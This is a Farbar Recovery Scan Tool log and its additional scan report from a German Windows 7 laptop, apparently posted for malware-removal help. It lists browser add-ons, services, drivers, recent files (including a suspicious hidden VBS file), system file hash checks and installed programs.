BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 172.20.10.1

FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)

Chrome:
=======
CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15]
CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15]
CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15]
CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15]
CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10]

==================== Services (Whitelisted) =================

R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated)
R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software)
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated)

==================== Drivers (Whitelisted) ====================

R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software)

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-04-14 10:43 - 2014-04-14 10:43 - 00017845 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-14 10:43 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-14 10:40 - 2014-04-14 10:42 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe
2014-04-09 11:27 - 2014-04-09 11:27 - 00000076 _____ () C:\Users\Franz\Desktop\Neues Textdokument.txt
2014-04-09 11:26 - 2013-09-22 17:47 - 00073266 ___SH () C:\Users\Franz\Desktop\wtbchkxbde..txt
2014-04-09 11:25 - 2014-04-09 11:25 - 00023940 _____ () C:\Users\Franz\Desktop\smadav.log
2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 __SHD () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-02 08:42 - 2014-04-07 09:25 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv
2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 ___SH () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 __SHD () C:\found.001
2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu

==================== One Month Modified Files and Folders =======

2014-04-14 10:43 - 2014-04-14 10:43 - 00017845 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-14 10:43 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-14 10:43 - 2013-04-16 19:13 - 01518797 _____ () C:\Windows\WindowsUpdate.log
2014-04-14 10:42 - 2014-04-14 10:40 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-14 10:29 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-04-14 10:28 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-04-14 10:28 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-04-14 10:28 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups
2014-04-14 10:17 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini
2014-04-14 10:17 - 2009-07-14 06:51 - 00087045 _____ () C:\Windows\setupact.log
2014-04-14 10:16 - 2013-04-16 22:17 - 00000266 _____ () C:\Windows\Tasks\AutoKMS.job
2014-04-14 10:16 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-04-14 02:10 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc
2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-12 00:15 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat
2014-04-12 00:15 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat
2014-04-12 00:15 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-04-09 11:28 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-04-09 11:27 - 2014-04-09 11:27 - 00000076 _____ () C:\Users\Franz\Desktop\Neues Textdokument.txt
2014-04-09 11:25 - 2014-04-09 11:25 - 00023940 _____ () C:\Users\Franz\Desktop\smadav.log
2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 __SHD () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-07 09:25 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox
2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 08:03 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos
2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 __SHD () C:\found.001
2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu

Some content of TEMP:
====================
C:\Users\Franz\AppData\Local\Temp\AskSLib.dll
C:\Users\Franz\AppData\Local\Temp\avgnt.exe
C:\Users\Franz\AppData\Local\Temp\CNFNOT32.EXE_0004.exe
C:\Users\Franz\AppData\Local\Temp\DW20.EXE_0001.exe
C:\Users\Franz\AppData\Local\Temp\MSOHTMED.EXE.x64.exe
C:\Users\Franz\AppData\Local\Temp\MSOHTMED.EXE.x86.exe
C:\Users\Franz\AppData\Local\Temp\ONELEV.EXE_1031.exe
C:\Users\Franz\AppData\Local\Temp\Quarantine.exe
C:\Users\Franz\AppData\Local\Temp\SCANPST.EXE_0002.exe
C:\Users\Franz\AppData\Local\Temp\VSTOInstaller_exe_x86.3643236F_FC70_11D3_A536_0090278A1BB8.41B86362_9D8B_4D9B_B426_8A6D1F809A25.exe
C:\Users\Franz\AppData\Local\Temp\{AADC5B76-0A49-47B1-96B7-3174A4380421}-34.0.1847.116_33.0.1750.154_chrome_updater.exe


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-03-24 00:49

==================== End Of Log ============================

--- --- ---

--- --- ---


Addition.txt:
Code:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 13-04-2014 01
Ran by Franz at 2014-04-14 10:44:16
Running from C:\Users\Franz\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

AV: Avira Desktop (Enabled - Out of date) {4D041356-F94D-285F-8768-AAE50FA36859}
AS: Avira Desktop (Enabled - Out of date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

µTorrent (HKCU\...\uTorrent) (Version: 3.3.2.30488 - BitTorrent Inc.)
Acer Backup Manager (HKLM-x32\...\InstallShield_{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.60 - NewTech Infosystems)
Acer Crystal Eye webcam (HKLM-x32\...\{51F026FA-5146-4232-A8BA-1364740BD053}) (Version: 1.0.3.5 - Liteon)
Acer eRecovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 4.05.3011 - Acer Incorporated)
Acer PowerSmart Manager (HKLM-x32\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 5.02.3001 - Acer Incorporated)
Acer Updater (HKLM-x32\...\{EE171732-BEB4-4576-887D-CB62727F01CA}) (Version: 1.02.3001 - Acer Incorporated)
Acer VCM (HKLM-x32\...\{047F790A-7A2A-4B6A-AD02-38092BA63DAC}) (Version: 4.05.3002 - Acer Incorporated)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe AIR (x32 Version: 1.5.0.7220 - Adobe Systems Inc.) Hidden
Adobe Flash Player 10 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 10.0.45.2 - Adobe Systems Incorporated)
Adobe Reader 9.1 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{6030FCD7-8F1A-427D-AF05-8DD1A2EA2ABA}) (Version: 1.5.17.05094 - Alcor Micro Corp.)
Alcor Micro USB Card Reader (x32 Version: 1.5.17.05094 - Alcor Micro Corp.) Hidden
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.105.2015.1110 - Alps Electric)
Apple Application Support (HKLM-x32\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.20 - Atheros Communications Inc.)
ATI Catalyst Install Manager (HKLM\...\{F5816A09-786E-C91D-3D99-8A8C92648750}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Avira Free Antivirus (HKLM-x32\...\Avira AntiVir Desktop) (Version: 14.0.3.350 - Avira)
Backup Manager Basic (x32 Version: 2.0.0.60 - NewTech Infosystems) Hidden
Bluetooth Win7 Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.01.000.18 - Atheros Communications)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Full New (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Light (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2010.0421.657.10561 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2010.0421.657.10561 - ATI) Hidden
CCC Help Chinese Standard (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Chinese Traditional (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Czech (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Danish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Dutch (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help English (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Finnish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help French (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help German (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Greek (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Hungarian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Italian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Japanese (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Korean (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Norwegian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Polish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Portuguese (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Russian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Spanish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Swedish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Thai (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Turkish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
ccc-core-static (x32 Version: 2010.0421.657.10561 - Ihr Firmenname) Hidden
ccc-utility64 (Version: 2010.0421.657.10561 - ATI) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Definition Update for Microsoft Office 2010 (KB982726) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DC4BC0CC-A928-4C48-BA40-AC24784F46E5}) (Version:  - Microsoft)
Dropbox (HKCU\...\Dropbox) (Version: 2.4.11 - Dropbox, Inc.)
Fotogalerie (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 33.0.1750.154 - Google Inc.)
Google Update Helper (x32 Version: 1.3.23.9 - Google Inc.) Hidden
HP Officejet 4620 series - Grundlegende Software für das Gerät (HKLM\...\{B16F9E6E-1388-472C-98C3-F32D397EF85D}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Update (HKLM-x32\...\{6F1C00D2-25C2-4CBA-8126-AE9A6E2E9CD5}) (Version: 5.003.003.001 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3003 - Acer Incorporated)
iFunbox (v2.7.2386.747), iFunbox DevTeam (HKLM-x32\...\iFunbox_is1) (Version: v2.7.2386.747 - )
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation)
iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.)
JDownloader 0.9 (HKLM-x32\...\5513-1208-7298-9440) (Version: 0.9 - AppWork GmbH)
Launch Manager (HKLM-x32\...\LManager) (Version: 4.0.10 - Acer Inc.)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office Access MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 32-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Italian) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 32-bit MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
MozBackup 1.5.1 (HKLM-x32\...\MozBackup) (Version:  - Pavel Cvrcek)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 24.3.0 - Mozilla)
Mozilla Thunderbird 24.3.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 24.3.0 (x86 de)) (Version: 24.3.0 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NetLimiter 3 (HKLM\...\{913923AB-3AAB-4870-8910-627C4CD82789}) (Version: 3.0.0.11 - Locktime Software s.r.o.)
Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Photo Gallery (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
PX Profile Update (x32 Version: 1.00.1. - AMD) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6029 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
Skype™ 6.14 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.14.104 - Skype Technologies S.A.)
TeraCopy 2.27 (HKLM\...\TeraCopy_is1) (Version:  - Code Sector)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2468871) (Version: 1 - Microsoft Corporation)
